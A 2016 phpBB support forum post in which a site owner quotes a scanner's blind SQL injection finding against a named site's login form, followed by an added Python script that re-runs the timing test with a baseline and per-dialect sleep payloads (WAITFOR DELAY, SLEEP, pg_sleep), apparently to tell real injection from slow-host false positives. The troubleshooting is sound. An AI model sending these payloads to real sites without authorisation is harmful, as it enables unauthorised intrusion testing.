Website security audit
Post by cpapaioannou » Sun Oct 30, 2016 4:55 am

Hello all,

I am having problems with a security audit on my site (https://wssa.beyondsecurity.com) regarding Vulnerabilities in Custom Web Code.

The errors are in relation to the following (the 39 failures):

Check                 Total   Failed   Passed
Blind SQL Injection     784       39      745
SQL Injection           952       39      913

One of the errors in more detail -
2. Vulnerabilities in Custom Web Code (High)
Port: http (80/tcp)
Summary:
We discovered vulnerabilities in the scripts listed below. Next to each script, there is a description of the type of attack that is possible, and the way to recreate the attack. If the attack is a simple HTTP GET request, you can usually paste it into your browser to see how it works. If it's a POST attack, the parameters for the POST request will be listed in square parenthesis.

Blind SQL Injection
URL: http://www.princessplace.ca/ucp.php?mode=login
Affected Parameter: password
Vector Used: VALUE';WAITFOR DELAY '00:00:24';--
Pattern found: Timing test
Complete Attack: http://www.princessplace.ca/ucp.php?mode=login [username= &password=';WAITFOR DELAY '00:00:24';-- &login=Login &redirect=./index.php?]

I have obtained a certificate for the site (https), but I am not sure what exactly these are referring to. I will note that when I was hosting the site on my internal NAS, I was not getting these errors, but on the hosting company's servers they started to come up. The hosting company doesn't seem to know what they are, and they directed me to get https set up with the thought that it would correct the errors.

I hope someone can help clear this up.

C
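The scanner's "Pattern found: Timing test" verdict is based on a single request taking at least as long as the delay it asked for (24 seconds). A slow shared host can satisfy that on its own, which is why such a finding is worth re-measuring with a control before treating it as a real injection. The script below is an added example, not code from the original post, from phpBB or from Beyond Security. It re-runs the timing test the way a tester would: it measures a baseline with a benign password, then measures the same form with increasing requested delays, and only calls the parameter injectable if the extra latency tracks the requested delay. It also tries the sleep primitive for each database dialect, because `WAITFOR DELAY` is SQL Server (T-SQL) syntax and produces no delay at all on MySQL or PostgreSQL, which are the databases a phpBB board normally runs on. Assumptions: the form fields are taken from the scanner's "Complete Attack" line and are assumed sufficient to reach the login query (phpBB may additionally want its form tokens); `simulated_server` is a constructed stand-in so the logic can be demonstrated offline; `http_form_sender` is the real sender and should only be pointed at a site you are authorised to test.

```python
"""Time-based blind SQL injection 'timing test', re-run with a control.

Added example (not phpBB or Beyond Security code). Instead of asking
"did one request take >= N seconds?", this asks "does the extra latency
track the delay we request, for the sleep primitive of the database
actually in use?". A host that is slow for every request fails that test.
"""
import re
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional, Sequence

# A sender submits one form and returns the seconds the server took to answer.
Sender = Callable[[Dict[str, str]], float]

# Parameter set copied from the scanner's "Complete Attack" line. Assumption:
# this is enough to reach the login query (phpBB may also want form tokens).
PHPBB_LOGIN_FORM = {"username": "", "password": "", "login": "Login",
                    "redirect": "./index.php?"}


def make_payloads(seconds: int) -> Dict[str, str]:
    """Sleep primitive per dialect. The T-SQL one is what the scanner sent;
    MySQL and PostgreSQL silently ignore it, so they get their own."""
    return {
        "mssql": f"';WAITFOR DELAY '00:00:{seconds:02d}';-- ",
        "mysql": f"' AND SLEEP({seconds})-- ",
        "postgres": f"';SELECT pg_sleep({seconds});-- ",
    }


def median_time(send: Sender, form: Dict[str, str], runs: int) -> float:
    """Median of `runs` submissions, so one network hiccup does not decide."""
    return statistics.median(send(form) for _ in range(runs))


def timing_test(send: Sender, base_form: Dict[str, str], field: str,
                delays: Sequence[int] = (2, 4), runs: int = 3,
                margin: float = 0.5) -> Dict[str, object]:
    """Per dialect, True only if every requested delay d adds at least
    d - margin seconds over a benign value in the same field."""
    baseline = median_time(send, dict(base_form, **{field: "x" * 32}), runs)
    verdicts: Dict[str, bool] = {}
    for dialect in make_payloads(0):
        extra = [median_time(send, dict(base_form,
                                        **{field: make_payloads(d)[dialect]}),
                             runs) - baseline
                 for d in delays]
        verdicts[dialect] = all(e >= d - margin for e, d in zip(extra, delays))
    return {"baseline": baseline, "verdicts": verdicts}


def http_form_sender(url: str, timeout: float = 90.0) -> Sender:
    """Real sender: POST the form to `url` and time the full response."""
    def send(form: Dict[str, str]) -> float:
        data = urllib.parse.urlencode(form).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        t0 = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                resp.read()
        except urllib.error.HTTPError:
            pass  # a 4xx/5xx page still tells us how long the server took
        return time.monotonic() - t0
    return send


def simulated_server(base_latency: float, backend: Optional[str]) -> Sender:
    """Constructed stand-in for the login page (no real sleeping).
    backend=None: the password never reaches SQL, so only base_latency
    applies; a large base_latency models the slow-host false positive.
    backend='mysql' etc.: the matching sleep primitive fires."""
    patterns = {
        "mssql": re.compile(r"WAITFOR DELAY '00:00:(\d\d)'"),
        "mysql": re.compile(r"SLEEP\((\d+)\)"),
        "postgres": re.compile(r"pg_sleep\((\d+)\)"),
    }

    def send(form: Dict[str, str]) -> float:
        elapsed = base_latency
        if backend is not None:
            m = patterns[backend].search(form.get("password", ""))
            if m:
                elapsed += int(m.group(1))
        return elapsed
    return send


if __name__ == "__main__":
    # A host that takes 30 s for every login would trip a one-shot 24 s
    # threshold, but the extra latency here is 0 s for every payload.
    print("slow host :", timing_test(simulated_server(30.0, None),
                                     PHPBB_LOGIN_FORM, "password"))
    # A naive string-concatenating MySQL backend: only SLEEP() tracks d.
    print("vulnerable:", timing_test(simulated_server(0.1, "mysql"),
                                     PHPBB_LOGIN_FORM, "password"))
    # Against a real board you own: swap the simulated sender for
    # http_form_sender("https://example.test/ucp.php?mode=login").
```

The two simulated runs make the distinction concrete: the 30-second host reports every dialect as not injectable because the delay is the same with or without the payload, while the concatenating MySQL backend is flagged only for the `SLEEP()` payload and not for the scanner's `WAITFOR DELAY` vector. Running the real sender against the login page with a couple of short delays (2 and 4 seconds, rather than one 24-second request) is enough to see which of the two pictures the hosted site matches.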

Return to “[3.1.x] Support Forum”